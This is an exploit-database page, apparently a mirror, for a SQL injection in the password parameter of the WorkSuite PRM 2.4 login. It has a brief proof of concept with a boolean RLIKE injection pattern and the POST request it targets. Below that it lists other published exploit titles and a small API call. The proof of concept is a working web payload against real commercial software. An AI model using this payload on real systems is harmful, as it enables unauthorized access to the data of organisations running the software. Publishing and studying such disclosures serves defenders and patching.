Menu

"WorkSuite PRM 2.4 - 'password' SQL Injection"

Author

"Mehmet EMIROGLU"

Platform

php

Release date

2019-07-01

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
===========================================================================================
# Exploit Title: WorkSuite PRM 2.4 - 'password' SQL Inj.
# Dork: N/A
# Date: 01-05-2019
# Exploit Author: Mehmet EMİROĞLU
# Vendor Homepage: https://codecanyon.net/item/worksuite-project-management-system/20052522
# Software Link: https://codecanyon.net/item/worksuite-project-management-system/20052522
# Version: v2.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Worksuite is a project management software written in Laravel 5.4 (PHP Framework) which is specifically developed for freelancers and SMEs (Small/Medium sized enterprises). You can manage your company's daily work, your employee's tasks, keep a track on project's progress and much more. It is designed with latest security and code standards.
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern : %27 RLIKE (case when  5021001=5021001 then 0x454d49524f474c55 else 0x28 end) and '7917'='7917
# POST Method :
http://localhost/worksuite24/public/login^_token=1knO8SR8Erjg56Mza4VaEv1Mb9lj5HiJBPmbTnFx&password=3115065[SQLINJECT HERE]
===========================================================================================
Release Date Title Type Platform Author
2019-08-16 "Integria IMS 5.0.86 - Arbitrary File Upload" webapps php Greg.Priest
2019-08-16 "Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-16 "EyesOfNetwork 5.1 - Authenticated Remote Command Execution" webapps php "Nassim Asrir"
2019-08-14 "WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery" webapps php "Princy Edward"
2019-08-14 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection" webapps php qw3rTyTy
2019-08-14 "SugarCRM Enterprise 9.0.0 - Cross-Site Scripting" webapps php "Ilca Lucian Florin"
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell" webapps php xerubus
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download" webapps php xerubus
2019-08-14 "Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-13 "AZORult Botnet - SQL Injection" remote php prsecurity
2019-08-13 "Agent Tesla Botnet - Arbitrary Code Execution" remote php prsecurity
2019-08-12 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Formula Injection" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting via File Upload" webapps php "Aishwarya Iyer"
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting" webapps php Greg.Priest
2019-08-12 "BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting" webapps php "Angelo Ruwantha"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection" webapps php qw3rTyTy
2019-08-08 "Adive Framework 2.0.7 - Cross-Site Request Forgery" webapps php "Pablo Santiago"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download" webapps php qw3rTyTy
2019-08-08 "Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)" webapps php "Mr Winst0n"
2019-08-08 "Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting" webapps php Greg.Priest
2019-08-08 "Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-07 "WordPress Plugin JoomSport 3.3 - SQL Injection" webapps php "Pablo Santiago"
2019-08-02 "1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting" webapps php "Kusol Watchara-Apanukorn"
2019-08-02 "Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection" webapps php n1x_
2019-08-02 "Sar2HTML 3.2.1 - Remote Command Execution" webapps php "Cemal Cihad ÇİFTÇİ"
2019-08-01 "WebIncorp ERP - SQL injection" webapps php n1x_
Release Date Title Type Platform Author
2019-07-08 "Karenderia Multiple Restaurant System 5.3 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-07-05 "Karenderia Multiple Restaurant System 5.3 - Local File Inclusion" webapps php "Mehmet EMIROGLU"
2019-07-01 "Varient 1.6.1 - SQL Injection" webapps multiple "Mehmet EMIROGLU"
2019-07-01 "CiuisCRM 1.6 - 'eventType' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-07-01 "WorkSuite PRM 2.4 - 'password' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-16 "DeepSound 1.0.4 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "PasteShr 1.6 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "Sales ERP 8.1 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-28 "BigTree 4.3.4 CMS - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-28 "Job Portal 3.1 - 'job_submit' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-20 "202CMS v10beta - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-19 "eNdonesia Portal 8.7 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-18 "TheCarProject v2 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-15 "Laundry CMS - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "ICE HRM 23.0 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-07 "Kados R10 GreenBee - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-05 "OpenDocMan 1.3.4 - 'search.php where' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-20 "HotelDruid 2.3 - Cross-Site Scripting" webapps php "Mehmet EMIROGLU"
2019-02-18 "Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload" webapps php "Mehmet EMIROGLU"
2019-02-18 "qdPM 9.1 - 'search[keywords]' Cross-Site Scripting" webapps php "Mehmet EMIROGLU"
2019-02-18 "qdPM 9.1 - 'type' Cross-Site Scripting" webapps php "Mehmet EMIROGLU"
2019-02-15 "qdPM 9.1 - 'search_by_extrafields[]' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-13 "PilusCart 1.4.1 - 'send' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-13 "Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting" webapps php "Mehmet EMIROGLU"
2019-02-11 "Webiness Inventory 2.3 - 'email' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-06 "osCommerce 2.3.4.1 - 'reviews_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-06 "osCommerce 2.3.4.1 - 'products_id' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-06 "osCommerce 2.3.4.1 - 'currency' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-04 "SuiteCRM 7.10.7 - 'record' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-02-04 "SuiteCRM 7.10.7 - 'parentTab' SQL Injection" webapps php "Mehmet EMIROGLU"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47045/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/47045/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47045/41448/worksuite-prm-24-password-sql-injection/download/", "exploit_id": "47045", "exploit_description": "\"WorkSuite PRM 2.4 - 'password' SQL Injection\"", "exploit_date": "2019-07-01", "exploit_author": "\"Mehmet EMIROGLU\"", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse